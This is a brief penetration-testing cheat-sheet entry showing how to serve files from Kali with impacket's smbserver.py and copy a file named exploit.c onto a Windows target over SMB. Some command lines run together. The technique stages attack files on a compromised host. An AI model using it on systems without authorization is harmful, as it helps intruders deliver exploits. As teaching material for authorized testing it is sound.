#Install with pip
python3 -m pip install impacket
#Kali: Locate the smbserver.py module
From kali /tmp exploit.c python3 /usr/share/doc/python3-impacket/examples/smbserver.py redcliff .
#Windows target:
cp \\\\10.10.10.10\\redcliff\exploit.c type exploit.c
Last updated 2 years ago